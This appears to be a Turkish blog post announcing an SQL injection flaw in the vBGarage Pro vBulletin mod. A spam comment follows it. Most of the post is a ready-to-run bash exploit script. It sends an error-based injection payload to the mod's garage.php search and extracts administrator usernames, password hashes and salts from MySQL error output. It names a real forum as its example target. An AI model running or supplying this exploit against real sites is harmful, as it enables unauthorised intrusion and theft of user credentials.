vBGarage Pro vBulletin Mod – SQL Injection

vBGarage Pro vBulletin Mod – SQL Injection Açığı bulundu. Açığın oluşum yeri ve kullanımı şu şekildedir.

#!/bin/bash 
############## 
# MegaManSec # 
############## 
############## 
#  InterNot  # 
############## 
echo "MegaManSec @ www.internot.info"
echo "White-Hat Hacker :)"
if [ -z "$1" ]; then
echo "Usage: $0 http://link.to/forum/"
echo "Example: $0 http://f800riders.org/forum/"
exit 1 
fi
tmpfile="/tmp/vbg.tmp"
echo "securitytoken=guest&s=&searchuser=&search_year=1&model_year=') IN (select (1) from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where usergroupid LIKE '%6%' LIMIT 1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''=''#&make_id=&model_id=&trim_id=&club_id=&category_id=&engine_type=&veh_class=&manufact_id=&product_id=&search_logic=any&do=search_results&submit=%3ESearch" > "$tmpfile"
 
sqldata=`curl -s -X POST -d @"$tmpfile" "$1"garage.php?do=search | grep -i 'MYSQL Error'| awk -F "Duplicate entry" '{print $2}' | awk -F "for key" '{print $1}' | w3m -dump -T text/html` 
if [ "$?" -gt "0" ]; then
echo "Either not vulnerable, or is not showing the hash+pwd, try manually if you don't believe"
exit 1 
fi
echo "Here is username:hash:salt"
echo "$sqldata"
rm "$tmpfile"
exit 0  

One comment

  1. casquette chicago bulls dedi ki:

    There are several good points right here with which I agree. I will have considered a few of them, nevertheless that is actually why I like this particular post.

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir